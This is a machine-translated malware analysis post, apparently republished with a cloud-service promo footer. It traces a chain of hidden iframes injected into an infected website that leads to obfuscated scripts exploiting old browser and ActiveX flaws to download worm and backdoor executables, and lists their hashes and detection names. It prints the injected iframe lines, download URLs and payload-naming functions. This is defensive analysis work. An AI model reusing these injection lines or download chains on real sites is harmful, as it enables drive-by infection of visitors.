Protected information networks of a certain origin are infected with trojans such as worm. win32.qqpass..
EndurerOriginal
1Version
Open the website, Kaspersky report:
/---
Detected: Trojan programTrojan-Clicker.HTML.IFrame.dkURL: hxxp: // x * X.9 *** 36 * 5.org/ip/1.htm
Detected: Trojan programTrojan-Clicker.HTML.IFrame.dkURL: hxxp: // A * C ** C. J * QX * x.org/live/index.htm
---/
Check the homepage code and find:
/---
<IFRAME src = "hxxp: // x * X.9 *** 36 * 5.org/ip/1.htm" width = 100 Height = 0> </iframe>
<IFRAME src = hxxp: // A * C ** C. J * QX * x.org/live/index.htm width = 100 Height = 0> </iframe>
<IFRAME src = "hxxp: // B * OC *. S * B ** B * 22.com/home/index.htm" width = 20 Height = 0> </iframe>
<IFRAME src = "hxxp: // www.gxycd.com.cn/images/xs.htm" width = "0" Height = "0" frameborder = "0"> </iframe>
---/
Hxxp: // x * X.9 *** 36 * 5.org/ip/1.htmThe content is:
/---
<IFRAME src = "hxxp: // web **. 2*0 ** 08yi *. com/" width = 0 Height = 0> </iframe>
<IFRAME src = "hxxp: // web **. 2*0 ** 08yi *. com/dyy.htm" width = 0 Height = 0> </iframe>
<IFRAME src = "hxxp: // A * BC. D * JX ** cn.com/abc/index.htm" width = 50 height = 0> </iframe>
---/
Hxxp: // web **. 2*0 ** 08yi *. comThe content is:
/---
<IFRAME src = "hxxp: // A * a *. 1 * 8d ** d.net/ww/new82.htm" width = 0 Height = 0> </iframe>
---/
Hxxp: // A * a *. 1 * 8d ** d.net/ww/new82.htmCode included:
/---
<IFRAME width = '0' Height = '0' src = 'hxxp: // A * a *. 1 * 8d ** d.net/aa/ki.htm'> </iframe>
---/
Hxxp: // A * a *. 1 * 8d ** d.net/aa/ki.htmContains a Javascript script, which is decrypted twice to obtain the source code,
The function is to check the cookie variable OK. If it does not exist, it is created and the code is output:
/---
<SCRIPT src = hxxp: // A * a *. 1 * 8d ** d.net/aa/1.js> </SCRIPT>
<SCRIPT src = hxxp: // A * a *. 1 * 8d ** d.net/aa/ B .js> </SCRIPT>
<SCRIPT src = hxp: // A * a *. 1 * 8d ** d.net/aa/pps.js> </SCRIPT>
<IFRAME width = '10' Height = '10' src = 'hxxp: // A * a *. 1 * 8d ** d.net/aa/baofeng.html'> </iframe>
---/
Use the storm audio and video vulnerability and baidubar. tool to download hxxp: // down.1 * 8d ** d.net/bb/bd.cab.
Hxxp: // web **. 2*0 ** 08yi *. com/dyy.htmThe content is:
/---
<IFRAME src = "hxxp: // B ** BB. M * m * 52 * 08.com/df.htm" width = 0 Height = 0> </iframe>
<IFRAME src = "hxxp: // MA * T. J * QX * x *. org/tt.htm" width = 0 Height = 0> </iframe>
---/
Hxxp: // A * C ** C. J * QX * x.org/live/index.htmThe content is:
/---
<IFRAME src = "hxxp: // web **. 2*0 ** 08yi *. com/" width = 0 Height = 0> </iframe>
<IFRAME src = "hxxp: // web **. 2*0 ** 08yi *. com/dyy.htm" width = 0 Height = 0> </iframe>
<IFRAME src = "hxxp: // A * BC. D * JX ** cn.com/abc/index.htm" width = 50 height = 0> </iframe>
---/
Hxxp: // B * OC *. S * B ** B * 22.com/home/index.htmThe content is:
/---
<IFRAME src = "hxxp: // B * OC *. S * B ** B * 22.com/" width = 0 Height = 0> </iframe>
<IFRAME src = "hxxp: // B ** BB. M * m * 52 * 08.com/df.htm" width = 0 Height = 0> </iframe>
<IFRAME src = "hxxp: // MA * T. J * QX * x *. org/tt.htm" width = 0 Height = 0> </iframe>
<IFRAME src = "hxxp: // A * BC. D * JX ** cn.com/abc/index.htm" width = 50 height = 0> </iframe>
---/
Hxxp: // B * OC *. S * B ** B * 22.com/The content is:
/---
<IFRAME src = "hxxp: // A * a *. 1 * 8d ** d.net/ww/new82.htm" width = 0 Height = 0> </iframe>
---/
Hxxp: // B ** BB. M * m * 52 * 08.com/df.htmThe content is:
/---
<IFRAME src = "hxxp: // www. I * P ** 5 * 30.com/bala.htm" width = 1 Height = 1> </iframe>
---/
Hxxp: // www. I * P ** 5 * 30.com/bala.htmCode included:
/---
<IFRAME width = '000000' Height = '000000' src = 'wm/s223.htm'> </iframe>
<IFRAME width = '000000' Height = '000000' src = 'wm/du7.htm'> </iframe>
<IFRAME width = '000000' Height = '000000' src = 'wm/bu5.htm'> </iframe>
---/
Hxxp: // www. I * P ** 5 * 30.com/wm/s223.htmThe content is:
/---
<Script language = JavaScript src = s321.js> </SCRIPT>
---/
Hxxp: // www. I * P ** 5 * 30.com/wm/s321.jsAfter two decryption to obtain the source code, the function is to use the MS06-014 vulnerability downloadHxxp: // www. I * P ** 5 * 30.com/down.exe, Save to % WINDIR %, the file name is defined by the function:
/---
Function ygjh2( rgi5d) {var WWW = ""; var oveas3 = math. Random () * rgi5d; return '~ Tmp'{math.round(oveas3}{'.exe '}
---/
Generate, that is ~ TMP *****. EXE, which is a number, can be started through cmd.exe.
File Description: D:/test/down.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 21:50:26
Modification time: 21:50:28
Access time:
Size: 17967 bytes, 17.559 KB
MD5: 33ab065beb165e42a59f6c1a5e4a7e4e
Sha1: eae693be65e601116afb639c66ee9ef1ea625469
CRC32: 8e1e4618
Scanned file: down.exe-infected
Down.exe-infectedWorm. win32.qqpass.
Hxxp: // www. I * P ** 5 * 30.com/wm/du7.htmIn the Javascript script, after 2 decryption to obtain the source code, the function is to use the Baidu bar (CLSID: {A7F05EE4-0426-454F-8013-C41E3596E9E9}) download hxxp: // * 2*6 ** 8i * P **. COM/baidu1.cab.
Baidu1.cab contains the same files as down.exe.
Hxxp: // www. I * P ** 5 * 30.com/wm/bu5.htmThe Javascript script in, after two decryption, obtains the source code, which is used by storm audio and video vulnerabilities.
Hxxp: // MA * T. J * QX * x *. org/tt.htmCode included:
/---
<IFRAME src = "hxxp: // E *. J * Open * Q * C *. com/xm1_htm" width = 20 Height = 0> </iframe>
---/
Hxxp: // E *. J * Open * Q * C *. com/xm1_htmCode included:
/---
<HTML>
<SCRIPT src = hxxp: // E *. J * Open * Q * C *. com/EE/E. js> </SCRIPT>
</Html>
<IFRAME src = "hxxp: // E *. J * Open * Q * C *. COM/EE/ee1.htm "width =" 100 "Height =" 0 "frameborder =" 0 "> </iframe>
<IFRAME src = "hxxp: // E *. J * Open * Q * C *. COM/EE/ee2.htm "width =" 100 "Height =" 0 "frameborder =" 0 "> </iframe>
<IFRAME src = "hxxp: // E *. J * Open * Q * C *. COM/EE/ee3.htm "width =" 100 "Height =" 0 "frameborder =" 0 "> </iframe>
<IFRAME src = "hxxp: // E *. J * Open * Q * C *. COM/EE/ee4.htm "width =" 100 "Height =" 0 "frameborder =" 0 "> </iframe>
<IFRAME src = "hxxp: // E *. J * Open * Q * C *. COM/EE/ee5.htm "width =" 100 "Height =" 0 "frameborder =" 0 "> </iframe>
<IFRAME src = "hxxp: // E *. J * Open * Q * C *. COM/EE/ee6.htm "width =" 100 "Height =" 0 "frameborder =" 0 "> </iframe>
<IFRAME src = "hxxp: // E *. J * Open * Q * C *. COM/EE/ee.htm "width =" 100 "Height =" 0 "frameborder =" 0 "> </iframe>
---/
Hxxp: // E *. J * Open * Q * C *. com/EE/E. js
Kaspersky reported: TrojanTrojan-Downloader.JS.Psyme.sf
Its content is decrypted once to obtain the source code, function for the use of MS06-014 vulnerability download:Hxxp: // E *. J * Open * Q * C *. com/eeecom.exe, Save to % WINDIR %, the file name is defined by the function:
/---
Function getran (m)
{
VaR numberran = math. Random () * m;
Aihao = '';
Return '~ Temp '+ math. Round (numberran) +'. tmp ';
}
---/
Generate, that is ~ TMP *****. tmp, ***** is a number, and can be started through cmd.exe.
File Description: D:/test/eeecom.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 14:16:54
Modification time: 14:16:55
Access time: 14:17:17
Size: 20284 bytes, 19.828 KB
MD5: edcd02800c270bcb44956e08b422c9d4
Sha1: cd728c2655e7ba1dc694efb6dbbd3d07033fa5cc
CRC32: 1c0d5f8a
Detected: VirusWorm. win32.downloader. AGFile: D:/test/eeecom.exe/pe_patch/upack
Hxxp: // E *. J * Open * Q * C *. com/EE/ee1.htmContent:
/---
<Script language = JavaScript src = hxxp: // E *. J * Open * Q * C *. com/EE/e2.js> </SCRIPT>
<Script language = JavaScript src = hxxp: // E *. J * Open * Q * C *. com/EE/e3.js> </SCRIPT>
---/
Hxxp: // E *. J * Open * Q * C *. com/EE/e2.jsSame as hxxp: // E *. J * Open * Q * C *. com/EE/E. js.
Hxxp: // E *. J * Open * Q * C *. com/EE/ee2.htmThe content is decrypted once to obtain the source code. The function is to use the Baidu bar to download hxxp: // E *. J * Open * Q * C *. COM/eeecom. cab.
Eeecom. Cab contains the testsign.exe and testsign. ini files.
File Description: D:/test/testsign.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time:
Size: 20384 bytes, 19.928 KB
MD5: 509dd358fb4b41aff6def3231bdf6b79
Sha1: dda08a6e095c4501c363fb75f1bb129a54763ed9
CRC32: 53c62eca
Scanned file: testsign.exe-infected
Testsign.exe-infectedWorm. win32.downloader. W
Rising news:Backdoor. win32.agent. ymv
Hxxp: // E *. J * Open * Q * C *. com/EE/ee3.htmCode included:
/---
<Script language = JavaScript src = hxxp: // E *. J * Open * Q * C *. com/EE/webxl. js> </SCRIPT>
---/
Hxxp: // E *. J * Open * Q * C *. com/EE/webxl. jsThe content is decrypted once and the source code is obtained. The function is to create a file C:/Documents and Settings/all users/Start Menu/Program/start/Microsofts by using the MS06-014 vulnerability. HTA uses the thunder vulnerability to call C:/progra ~ 1/intern ~ 1/iexplore. EXE open hxxp: // E *. J * Open * Q * C *. com/EE/webxl.htm, download and execute ysydown1_1cmd.exe.
There is a variable named qq275756717.
Hxxp: // E *. J * Open * Q * C *. com/EE/webxl.htm
/---
<Src = "hxxp: // E *. J * Open * Q * C *. com/eeecom.exe"> </SCRIPT>
---/
Hxxp: // E *. J * Open * Q * C *. com/eeecom.exeSame as testsign.exe.
Hxxp: // E *. J * Open * Q * C *. com/EE/ee4.htm
Kapspersky reports as a TrojanTrojan-Downloader.VBS.Small.fw
Contains VBScript code, the original code is decrypted twice, the function is to use the MS06-014 vulnerability download:Hxxp: // E *. J * Open * Q * C *. com/eeecom.exe, Save to % WINDIR %, the file name is defined by the function:
/---
Function Gn (rrageyku1) {var orh2 = Window ["math"] ["random"] () * rrageyku1; return '~ TMP '+'. tmp '}
---/
Generate, that is ~ Tmp.tmp, which can be started through cmd.exe.
Hxxp: // E *. J * Open * Q * C *. com/EE/ee5.htmCode included:
/---
<Script language = JavaScript src = hxxp: // E *. J * Open * Q * C *. com/EE/BB. js> </SCRIPT>
---/
Hxxp: // E *. J * Open * Q * C *. com/EE/BB. jsRun the custom function kao_kaspersky () to check the cookie variable cookie1. If the cookie variable does not exist, create it and output the Code:
/---
<IFRAME width = 100 Height = 100 src = "hxxp: // E *. J * Open * Q * C *. COM/EE // bf.htm/"> </iframe>
---/
Hxxp: // E *. J * Open * Q * C *. com/EE/bf.htm
Kapspersky reports malicious programsExploit. js. Agent. bw
The original code is obtained after the content is decrypted twice, and the code is used for the storm audio and video vulnerability.
Hxxp: // E *. J * Open * Q * C *. com/EE/ee6.htm
Kapspersky reports as a TrojanTrojan-Downloader.JS.Small.hk
The content is jetaudio 7.x vulnerability exploitation code. Information contained:
/---
Jetaudio 7.x ActiveX downloadfrommusicstore () 0day Remote Code Execution Exploit
Bug discovered by krystian kloskowski (h07) Tested on :..
-Jetaudio 7.0.3 basic
-Microsoft Internet Explorer 6
Just for fun
---/
The source code is decrypted once, and the function is to use Yahoo! Messenger control (CLSID: 24f3ead6-8b87-4c1a-9745071c126bda08f) Vulnerability and edraw office viewer component 5.2 ActiveX (CLSID: 6ba21c22-53a5-463f-bbe8-5cf7ffa0132b) vulnerability downloadHxxp: // * 60.190.101.206/**/abc.exeSave as C:/uu.exe and C:/test.exe and run the command.
File Description: D:/test/abc.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 22:48:10
Modification time: 22:48:12
Access time:
Size: 20380 bytes, 19.924 KB
MD5: ef943281ace810485223d61354d32de4
Sha1: 00f5000e139d662c60d5e46bf744d42dfc762d25
CRC32: 5fbde357
Scanned file: abc.exe-infected
Abc.exe-infectedWorm. win32.downloader. W
Reported by rising: D:/test/abc.exe> upack0.39Backdoor. win32.agent. ymv
Hxxp: // A * BC. D * JX ** cn.com/abc/index.htm
Kapspersky reports as a TrojanTrojan. vbs. Small. ad
Its contents include:
/---
<IFRAME src = hxxp: // A * BC. D * JX ** cn.com/abc/xp017.htm width = 50 height = 0> </iframe>
---/
And VBSCRIPT script, the original code is decrypted twice, the function is to download by using the MS06-014 VulnerabilityHxxp: // A * BC. D * JX ** cn.com/abc/svcos.exe, Save as oizqdnx.com, and create wkvxtgu. vbs to start.
File Description: D:/test/svcos.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 13:14:48
Modification time: 13:15:38
Access time: 13:16:50
Size: 68096 bytes, 66.512 KB
MD5: 7bbf143b15089d0ada39a323429bc7c4
Sha1: 2b3be95f577af7d22fdba12454e6cff61f021043
CRC32: c534f3f1
Kaspersky reported that the trojan program has been detected.Trojan-Downloader.Win32.Delf.ctxFile: D:/test/svcos.exe
RisingTrojan. win32.agent. zri
Hxxp: // A * BC. D * JX ** cn.com/abc/xp017.htmContent:
/---
<Div style = "cursor: URL (ah. C)"> </div>
<SCRIPT type = "text/JScript"> function Init () {document. Write ("");} window. onload = Init; </SCRIPT>
---/
Hxxp: // A * BC. D * JX ** cn.com/abc/ah.cDownload hxxp: // A * BC. D * JX ** cn.com/abc/svcos.exe with MS-07-002/ani Vulnerability
Hxxp: // www. g * x * y * C ** d.com.cn/images/xs.htmFailed to open.
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
